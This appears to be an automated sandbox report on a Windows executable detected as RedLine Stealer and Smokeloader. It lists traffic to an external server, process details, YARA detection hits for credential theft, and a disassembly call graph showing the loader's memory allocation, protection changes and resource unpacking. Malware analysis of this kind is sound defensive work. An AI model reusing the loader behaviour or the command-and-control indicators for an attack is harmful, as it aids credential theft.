                                                                                                                                                                    May 28, 2023 10:33:16.651643038 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.651725054 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.651878119 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652024031 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652101040 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652136087 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652328968 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652364016 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652532101 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652568102 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652682066 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652770042 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652920961 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.652956963 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653069019 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653197050 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.653215885 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653338909 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:16.653359890 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653397083 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653517962 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653666019 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653755903 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653850079 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.653938055 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654076099 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654128075 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654218912 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654472113 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654506922 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654541016 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654680967 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654872894 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654961109 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.654995918 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.655082941 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.655169964 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.680819988 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.680877924 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.680913925 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.680951118 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.681207895 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.681245089 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.681574106 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.681611061 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.681741953 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.681973934 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682152033 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682218075 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682293892 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682486057 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682523966 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682626963 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682724953 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682802916 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.682943106 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.683017969 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.683171988 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.683314085 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.683348894 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.683486938 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.683640003 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.686717033 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:16.817044020 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:17.133493900 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:17.161988020 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:17.206000090 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:18.247431040 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:18.275186062 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:18.277308941 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:18.325258017 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:18.352591991 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:18.379966974 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:18.380645037 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:18.434679985 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:19.314503908 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:19.342839003 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:19.387808084 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:20.325798035 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:20.353513002 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.353565931 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.353601933 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.353635073 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.353667021 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.355135918 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.355628967 CEST4970123368192.168.2.351.210.170.199
                                                                                                                                                                    May 28, 2023 10:33:20.383651018 CEST233684970151.210.170.199192.168.2.3
                                                                                                                                                                    May 28, 2023 10:33:20.413443089 CEST4970123368192.168.2.351.210.170.199

                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:10:32:56
                                                                                                                                                                    Start date:28/05/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\Igv6ymbAA3.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\Igv6ymbAA3.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:356864 bytes
                                                                                                                                                                    MD5 hash:18ECF495A7E8DC91DE0F57F60C9896F8
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                    • Rule: MAL_Malware_Imphash_Mar23_1, Description: Detects malware by known bad imphash or rich_pe_header_hash, Source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.401980636.00000000025EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.401246578.0000000000989000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:5.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:26.5%
                                                                                                                                                                      Signature Coverage:15.5%
                                                                                                                                                                      Total number of Nodes:343
                                                                                                                                                                      Total number of Limit Nodes:36
                                                                                                                                                                      execution_graph 37261 2410920 TerminateProcess 37262 241092b GetPEB 37263 2410972 37262->37263 37264 241003c 37265 2410049 37264->37265 37279 2410e0f SetErrorMode SetErrorMode 37265->37279 37270 2410265 37271 24102ce VirtualProtect 37270->37271 37273 241030b 37271->37273 37272 2410439 VirtualFree 37277 24105f4 LoadLibraryA 37272->37277 37278 24104be 37272->37278 37273->37272 37274 24104e3 LoadLibraryA 37274->37278 37276 24108c7 37277->37276 37278->37274 37278->37277 37280 2410223 37279->37280 37281 2410d90 37280->37281 37282 2410dad 37281->37282 37283 2410dbb GetPEB 37282->37283 37284 2410238 VirtualAlloc 37282->37284 37283->37284 37284->37270 37285 40cbdd 37286 40cbe9 _fputc 37285->37286 37320 40d534 HeapCreate 37286->37320 37289 40cc46 37322 41087e GetModuleHandleW 37289->37322 37293 40cc57 __RTC_Initialize 37356 411a15 37293->37356 37296 40cc66 37297 40cc72 GetCommandLineA 37296->37297 37487 40e79a 64 API calls 3 library calls 37296->37487 37371 412892 37297->37371 37300 40cc71 37300->37297 37304 40cc97 37407 41255f 37304->37407 37310 40cca8 37422 40e859 37310->37422 37311 40ccb0 37312 40ccbb 37311->37312 37490 40e79a 64 API calls 3 library calls 37311->37490 37428 4019f0 OleInitialize 37312->37428 37315 40ccd8 37316 40ccea 37315->37316 37482 40ea0a 37315->37482 37491 40ea36 64 API calls _doexit 37316->37491 37319 40ccef _fputc 37321 40cc3a 37320->37321 37321->37289 37485 40cbb4 64 API calls 3 library calls 37321->37485 37323 410892 37322->37323 37324 410899 37322->37324 37492 40e76a Sleep GetModuleHandleW 37323->37492 37326 410a01 37324->37326 37327 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37324->37327 37524 410598 8 API calls __decode_pointer 37326->37524 37330 4108ec TlsAlloc 37327->37330 37329 410898 37329->37324 37332 40cc4c 37330->37332 37333 41093a TlsSetValue 37330->37333 37332->37293 37486 40cbb4 64 API calls 3 library calls 37332->37486 37333->37332 37334 41094b 37333->37334 37493 40ea54 6 API calls 4 library calls 37334->37493 37336 410950 37494 41046e TlsGetValue 37336->37494 37339 41046e __encode_pointer 6 API calls 37340 41096b 37339->37340 37341 41046e __encode_pointer 6 API calls 37340->37341 37342 41097b 37341->37342 37343 41046e __encode_pointer 6 API calls 37342->37343 37344 41098b 37343->37344 37504 40d564 InitializeCriticalSectionAndSpinCount __getstream 37344->37504 37346 410998 37346->37326 37505 4104e9 TlsGetValue 37346->37505 37351 4104e9 __decode_pointer 7 API calls 37352 4109df 37351->37352 37352->37326 37353 4109e6 37352->37353 37523 4105d5 64 API calls 5 library calls 37353->37523 37355 4109ee GetCurrentThreadId 37355->37332 37554 40e1d8 37356->37554 37358 411a21 GetStartupInfoA 37359 411cba __calloc_crt 64 API calls 37358->37359 37360 411a42 37359->37360 37361 411c60 _fputc 37360->37361 37364 411cba __calloc_crt 64 API calls 37360->37364 37366 411ba7 37360->37366 37368 411b2a 37360->37368 37361->37296 37362 411bdd GetStdHandle 37362->37366 37363 411c42 SetHandleCount 37363->37361 37364->37360 37365 411bef GetFileType 37365->37366 37366->37361 37366->37362 37366->37363 37366->37365 37556 41389c InitializeCriticalSectionAndSpinCount _fputc 37366->37556 37367 411b53 GetFileType 37367->37368 37368->37361 37368->37366 37368->37367 37555 41389c InitializeCriticalSectionAndSpinCount _fputc 37368->37555 37372 4128b0 GetEnvironmentStringsW 37371->37372 37373 4128cf 37371->37373 37374 4128c4 GetLastError 37372->37374 37375 4128b8 37372->37375 37373->37375 37376 412968 37373->37376 37374->37373 37377 4128eb GetEnvironmentStringsW 37375->37377 37384 4128fa WideCharToMultiByte 37375->37384 37378 412971 GetEnvironmentStrings 37376->37378 37382 40cc82 37376->37382 37377->37382 37377->37384 37378->37382 37383 412981 37378->37383 37380 41295d FreeEnvironmentStringsW 37380->37382 37381 41292e 37557 411c75 37381->37557 37396 4127d7 37382->37396 37383->37383 37385 411c75 __malloc_crt 64 API calls 37383->37385 37384->37380 37384->37381 37387 41299b 37385->37387 37389 4129a2 FreeEnvironmentStringsA 37387->37389 37390 4129ae ___crtGetEnvironmentStringsA 37387->37390 37389->37382 37394 4129b8 FreeEnvironmentStringsA 37390->37394 37391 41293c WideCharToMultiByte 37392 412956 37391->37392 37393 41294e 37391->37393 37392->37380 37563 40b6b5 64 API calls _fputc 37393->37563 37394->37382 37397 4127f1 GetModuleFileNameA 37396->37397 37398 4127ec 37396->37398 37400 412818 37397->37400 37603 41446b 108 API calls __setmbcp 37398->37603 37597 41263d 37400->37597 37402 40cc8c 37402->37304 37488 40e79a 64 API calls 3 library calls 37402->37488 37404 411c75 __malloc_crt 64 API calls 37405 41285a 37404->37405 37405->37402 37406 41263d _parse_cmdline 74 API calls 37405->37406 37406->37402 37408 412568 37407->37408 37410 41256d _strlen 37407->37410 37605 41446b 108 API calls __setmbcp 37408->37605 37411 411cba __calloc_crt 64 API calls 37410->37411 37414 40cc9d 37410->37414 37417 4125a2 _strlen 37411->37417 37412 412600 37608 40b6b5 64 API calls _fputc 37412->37608 37414->37310 37489 40e79a 64 API calls 3 library calls 37414->37489 37415 411cba __calloc_crt 64 API calls 37415->37417 37416 412626 37609 40b6b5 64 API calls _fputc 37416->37609 37417->37412 37417->37414 37417->37415 37417->37416 37420 4125e7 37417->37420 37606 40ef42 64 API calls _fputc 37417->37606 37420->37417 37607 40e61c 10 API calls 3 library calls 37420->37607 37423 40e867 __IsNonwritableInCurrentImage 37422->37423 37610 413586 37423->37610 37425 40e885 __initterm_e 37427 40e8a4 __IsNonwritableInCurrentImage __initterm 37425->37427 37614 40d2bd 75 API calls __cinit 37425->37614 37427->37311 37429 401ab9 37428->37429 37615 40b99e 37429->37615 37431 401abf 37432 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 37431->37432 37458 402467 37431->37458 37433 401dc3 FindCloseChangeNotification GetModuleHandleA 37432->37433 37439 401c55 37432->37439 37628 401650 37433->37628 37435 401e8b FindResourceA LoadResource LockResource SizeofResource 37436 40b84d _malloc 64 API calls 37435->37436 37437 401ebf 37436->37437 37630 40af66 37437->37630 37440 401c9c CloseHandle 37439->37440 37444 401cf9 Module32Next 37439->37444 37440->37315 37441 401ecb _memset 37442 401efc SizeofResource 37441->37442 37443 401f5f 37442->37443 37447 401f1c 37442->37447 37446 401f92 _memset 37443->37446 37669 401560 __VEC_memcpy ___sbh_free_block 37443->37669 37444->37433 37454 401d0f 37444->37454 37449 401fa2 FreeResource 37446->37449 37447->37443 37668 401560 __VEC_memcpy ___sbh_free_block 37447->37668 37450 40b84d _malloc 64 API calls 37449->37450 37451 401fbb SizeofResource 37450->37451 37452 401fe5 _memset 37451->37452 37453 4020aa LoadLibraryA 37452->37453 37455 401650 37453->37455 37454->37440 37457 401dad Module32Next 37454->37457 37456 40216c GetProcAddress 37455->37456 37456->37458 37459 4021aa 37456->37459 37457->37433 37457->37454 37458->37315 37459->37458 37642 4018f0 37459->37642 37461 40243f 37461->37458 37670 40b6b5 64 API calls _fputc 37461->37670 37463 4021f1 37463->37461 37654 401870 37463->37654 37465 402269 VariantInit 37466 401870 77 API calls 37465->37466 37467 40228b VariantInit 37466->37467 37468 4022a7 37467->37468 37469 4022d9 SafeArrayCreate SafeArrayAccessData 37468->37469 37659 40b350 37469->37659 37472 40232c 37473 402354 SafeArrayDestroy 37472->37473 37481 40235b 37472->37481 37473->37481 37474 402392 SafeArrayCreateVector 37475 4023a4 37474->37475 37476 4023bc VariantClear VariantClear 37475->37476 37661 4019a0 37476->37661 37479 40242e 37480 4019a0 67 API calls 37479->37480 37480->37461 37481->37474 37692 40e8de 37482->37692 37484 40ea1b 37484->37316 37485->37289 37486->37293 37487->37300 37488->37304 37489->37310 37490->37312 37491->37319 37492->37329 37493->37336 37495 4104a7 GetModuleHandleW 37494->37495 37496 410486 37494->37496 37498 4104c2 GetProcAddress 37495->37498 37499 4104b7 37495->37499 37496->37495 37497 410490 TlsGetValue 37496->37497 37502 41049b 37497->37502 37500 41049f 37498->37500 37525 40e76a Sleep GetModuleHandleW 37499->37525 37500->37339 37502->37495 37502->37500 37503 4104bd 37503->37498 37503->37500 37504->37346 37506 410501 37505->37506 37507 410522 GetModuleHandleW 37505->37507 37506->37507 37510 41050b TlsGetValue 37506->37510 37508 410532 37507->37508 37509 41053d GetProcAddress 37507->37509 37526 40e76a Sleep GetModuleHandleW 37508->37526 37512 41051a 37509->37512 37513 410516 37510->37513 37515 410555 37512->37515 37516 41054d RtlDecodePointer 37512->37516 37513->37507 37513->37512 37514 410538 37514->37509 37514->37515 37515->37326 37517 411cba 37515->37517 37516->37515 37520 411cc3 37517->37520 37519 4109c5 37519->37326 37519->37351 37520->37519 37521 411ce1 Sleep 37520->37521 37527 40e231 37520->37527 37522 411cf6 37521->37522 37522->37519 37522->37520 37523->37355 37525->37503 37526->37514 37528 40e23d _fputc 37527->37528 37529 40e274 _memset 37528->37529 37530 40e255 37528->37530 37533 40e2e6 RtlAllocateHeap 37529->37533 37537 40e26a _fputc 37529->37537 37542 40d6e0 37529->37542 37549 40def2 5 API calls 2 library calls 37529->37549 37550 40e32d LeaveCriticalSection _doexit 37529->37550 37551 40d2e3 7 API calls __decode_pointer 37529->37551 37540 40bfc1 64 API calls __getptd_noexit 37530->37540 37532 40e25a 37541 40e744 7 API calls 2 library calls 37532->37541 37533->37529 37537->37520 37540->37532 37543 40d6f5 37542->37543 37544 40d708 EnterCriticalSection 37542->37544 37552 40d61d 64 API calls 9 library calls 37543->37552 37544->37529 37546 40d6fb 37546->37544 37553 40e79a 64 API calls 3 library calls 37546->37553 37548 40d707 37548->37544 37549->37529 37550->37529 37551->37529 37552->37546 37553->37548 37554->37358 37555->37368 37556->37366 37560 411c7e 37557->37560 37559 411cb4 37559->37380 37559->37391 37560->37559 37561 411c95 Sleep 37560->37561 37564 40b84d 37560->37564 37562 411caa 37561->37562 37562->37559 37562->37560 37563->37392 37565 40b900 37564->37565 37566 40b85f 37564->37566 37591 40d2e3 7 API calls __decode_pointer 37565->37591 37573 40b8bc RtlAllocateHeap 37566->37573 37575 40b870 37566->37575 37576 40b8ec 37566->37576 37579 40b8f1 37566->37579 37581 40b8f8 37566->37581 37587 40b7fe 64 API calls 4 library calls 37566->37587 37588 40d2e3 7 API calls __decode_pointer 37566->37588 37568 40b906 37592 40bfc1 64 API calls __getptd_noexit 37568->37592 37573->37566 37575->37566 37582 40ec4d 64 API calls 2 library calls 37575->37582 37583 40eaa2 64 API calls 7 library calls 37575->37583 37584 40e7ee 37575->37584 37589 40bfc1 64 API calls __getptd_noexit 37576->37589 37590 40bfc1 64 API calls __getptd_noexit 37579->37590 37581->37560 37582->37575 37583->37575 37593 40e7c3 GetModuleHandleW 37584->37593 37587->37566 37588->37566 37589->37579 37590->37581 37591->37568 37592->37581 37594 40e7d7 GetProcAddress 37593->37594 37595 40e7ec ExitProcess 37593->37595 37594->37595 37596 40e7e7 CorExitProcess 37594->37596 37596->37595 37599 41265c 37597->37599 37601 4126c9 37599->37601 37604 416836 74 API calls x_ismbbtype_l 37599->37604 37600 4127c7 37600->37402 37600->37404 37601->37600 37602 416836 74 API calls _parse_cmdline 37601->37602 37602->37601 37603->37397 37604->37599 37605->37410 37606->37417 37607->37420 37608->37414 37609->37414 37611 41358c 37610->37611 37612 41046e __encode_pointer 6 API calls 37611->37612 37613 4135a4 37611->37613 37612->37611 37613->37425 37614->37427 37618 40b9aa _fputc _strnlen 37615->37618 37616 40b9b8 37671 40bfc1 64 API calls __getptd_noexit 37616->37671 37618->37616 37620 40b9ec 37618->37620 37619 40b9bd 37672 40e744 7 API calls 2 library calls 37619->37672 37622 40d6e0 __lock 64 API calls 37620->37622 37623 40b9f3 37622->37623 37673 40b917 122 API calls 3 library calls 37623->37673 37625 40b9cd _fputc 37625->37431 37626 40b9ff 37674 40ba18 LeaveCriticalSection _doexit 37626->37674 37629 4017cc ___crtGetEnvironmentStringsA 37628->37629 37629->37435 37632 40af70 37630->37632 37631 40b84d _malloc 64 API calls 37631->37632 37632->37631 37633 40af8a 37632->37633 37637 40af8c std::bad_alloc::bad_alloc 37632->37637 37675 40d2e3 7 API calls __decode_pointer 37632->37675 37633->37441 37636 40afbc 37678 40cd39 RaiseException 37636->37678 37641 40afb2 37637->37641 37676 40d2bd 75 API calls __cinit 37637->37676 37640 40afca 37677 40af49 64 API calls std::exception::exception 37641->37677 37643 401903 lstrlenA 37642->37643 37644 4018fc 37642->37644 37679 4017e0 37643->37679 37644->37463 37647 401940 GetLastError 37649 40194b MultiByteToWideChar 37647->37649 37651 40198d 37647->37651 37648 401996 37648->37463 37650 4017e0 74 API calls 37649->37650 37652 401970 MultiByteToWideChar 37650->37652 37651->37648 37687 401030 GetLastError 37651->37687 37652->37651 37655 40af66 76 API calls 37654->37655 37656 40187c 37655->37656 37657 401885 SysAllocString 37656->37657 37658 4018a4 37656->37658 37657->37658 37658->37465 37660 40231a SafeArrayUnaccessData 37659->37660 37660->37472 37662 4019aa InterlockedDecrement 37661->37662 37667 4019df VariantClear 37661->37667 37663 4019b8 37662->37663 37662->37667 37664 4019c2 SysFreeString 37663->37664 37666 4019c9 37663->37666 37663->37667 37664->37666 37691 40aec0 65 API calls _fputc 37666->37691 37667->37479 37668->37447 37669->37446 37670->37458 37671->37619 37673->37626 37674->37625 37675->37632 37676->37641 37677->37636 37678->37640 37680 4017e9 37679->37680 37684 401844 37680->37684 37685 40182d 37680->37685 37688 40b783 74 API calls 4 library calls 37680->37688 37686 40186d MultiByteToWideChar 37684->37686 37690 40b743 64 API calls 2 library calls 37684->37690 37685->37684 37689 40b6b5 64 API calls _fputc 37685->37689 37686->37647 37686->37648 37688->37685 37689->37684 37690->37684 37691->37667 37693 40e8ea _fputc 37692->37693 37694 40d6e0 __lock 64 API calls 37693->37694 37695 40e8f1 37694->37695 37697 4104e9 __decode_pointer 7 API calls 37695->37697 37700 40e9aa __initterm 37695->37700 37699 40e928 37697->37699 37699->37700 37703 4104e9 __decode_pointer 7 API calls 37699->37703 37709 40e9f5 37700->37709 37702 40e9f2 _fputc 37702->37484 37708 40e93d 37703->37708 37704 40e9e9 37705 40e7ee _malloc 4 API calls 37704->37705 37705->37702 37706 4104e9 7 API calls __decode_pointer 37706->37708 37707 4104e0 6 API calls ___crtMessageBoxW 37707->37708 37708->37700 37708->37706 37708->37707 37710 40e9d6 37709->37710 37711 40e9fb 37709->37711 37710->37702 37713 40d606 LeaveCriticalSection 37710->37713 37714 40d606 LeaveCriticalSection 37711->37714 37713->37704 37714->37710

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
